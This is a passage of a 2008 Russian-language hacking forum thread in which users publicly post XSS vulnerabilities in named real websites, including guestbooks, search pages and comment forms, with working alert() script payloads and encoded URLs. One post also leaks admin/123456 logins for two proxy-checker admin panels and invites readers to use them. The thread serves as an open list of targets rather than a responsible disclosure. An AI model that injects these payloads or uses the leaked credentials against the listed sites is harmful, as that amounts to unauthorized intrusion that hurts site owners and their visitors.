ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #181  
Старый 24.05.2008, 21:57
КВР
Познающий
Регистрация: 23.04.2008
Сообщений: 39
Провел на форуме:
198086

Репутация: 135
По умолчанию

_http://checkproxy.nnm.netserv.name/
admin
123456

_http://queen-love.com/proxy5/
admin
123456

Юзайте и не просите больше никого о халявных прокси.
 

  #182  
Старый 27.05.2008, 22:42
echobyte
Moderator - Level 7
Регистрация: 07.03.2008
Сообщений: 568
Провел на форуме:
4140471

Репутация: 708


Отправить сообщение для echobyte с помощью ICQ
По умолчанию

 

  #183  
Старый 30.05.2008, 21:48
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Chronicle.com - Деньги
Цитата:
/forums/index.php?board=[XSS]
/forums/index.php?topic=[XSS]
 

  #184  
Старый 31.05.2008, 02:05
Kusto
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
Провел на форуме:
7518056

Репутация: 1089


Отправить сообщение для Kusto с помощью ICQ
По умолчанию

http://www.all-biz.info/ru/

при регистрации уязвимы пактически все поля(для активных XSS), вчастности поле "о предриятии", зарегиться до конца неудалось- за регу требют 35400 руб
ну а чтоб вам небыло скушно вот вам хоть и пассивная но тоже XSS)))
http://www.all-biz.info/ru/enterprises/?btn_search=1&findentry=%3Cscript%3Ealert%28%27%D0 %B1%D0%B0%D0%BC%D1%81%27%29%3C%2Fscript%3E&cs=&ac_ category=&btn_search=%D0%98%D1%81%D0%BA%D0%B0%D1%8 2%D1%8C
 

  #185  
Старый 31.05.2008, 16:15
Buffalon
Постоянный
Регистрация: 22.03.2008
Сообщений: 325
Провел на форуме:
1208132

Репутация: 63
По умолчанию

http://o-sport.ru/guestbook/index.php

0Й... .Вводите в гостевой
<script>alert()</script>
и всё
 

  #186  
Старый 01.06.2008, 11:12
D9D9_VAD9
Участник форума
Регистрация: 15.04.2008
Сообщений: 149
Провел на форуме:
9493907

Репутация: 259
По умолчанию

svadbann.ru

Гостевая книга
http://www.svadbann.ru/q_answer.html

Активны все три поля, сообщение, имя, мыло
 

  #187  
Старый 04.06.2008, 19:58
echobyte
Moderator - Level 7
Регистрация: 07.03.2008
Сообщений: 568
Провел на форуме:
4140471

Репутация: 708


Отправить сообщение для echobyte с помощью ICQ
По умолчанию

http://classifieds.invictory.org
уязвимы обьявления
 

  #188  
Старый 08.06.2008, 12:55
otmorozok428
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623

Репутация: 415
По умолчанию

Сайт Российских Сутенёров

http://www.suter.ru/blacklist.html

POST-форма, поле "Дополнительно:
(краткое описание происшетшего)"


Цитата:
<script>alert("Сайт закрыт за нарушение действующего законодательства Российской Федерации")</script>
 

  #189  
Старый 09.06.2008, 18:15
fatalo
Участник форума
Регистрация: 15.05.2008
Сообщений: 166
Провел на форуме:
2591223

Репутация: 128
Отправить сообщение для fatalo с помощью ICQ
По умолчанию

karaul.ru/
Xss найдена в добавление комментария.
Вот пример:
Код HTML:
_http://karaul.ru/30.12.2004/13/comments
_http://karaul.ru/09.06.2008/11/comments
В поле имя вводите стандартное:
PHP код:
<script>alert('antichat.ru')</script
И получаете желаемое!Хочу сказать,что караул.ру является довольно посещаемым ресурсом.
 

  #190  
Старый 10.06.2008, 14:45
fatalo
Участник форума
Регистрация: 15.05.2008
Сообщений: 166
Провел на форуме:
2591223

Репутация: 128
Отправить сообщение для fatalo с помощью ICQ
По умолчанию

www.skisport.ru
Оффициальный сайт журанала лыжный спорт.
Пример скрипта:
Код HTML:
http://www.skisport.ru/search/index.php?search=%3Cscript%3Ealert%28%27fatalo+for+antichat.ru%27%29%3C%2Fscript%3E&days=&dts=&dte=
У этого ресурса бажная функция поиска по сайту.
Как обычно пишем:
PHP код:
<script>alert('antichat.ru want you!')</script
И творим добро =)
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ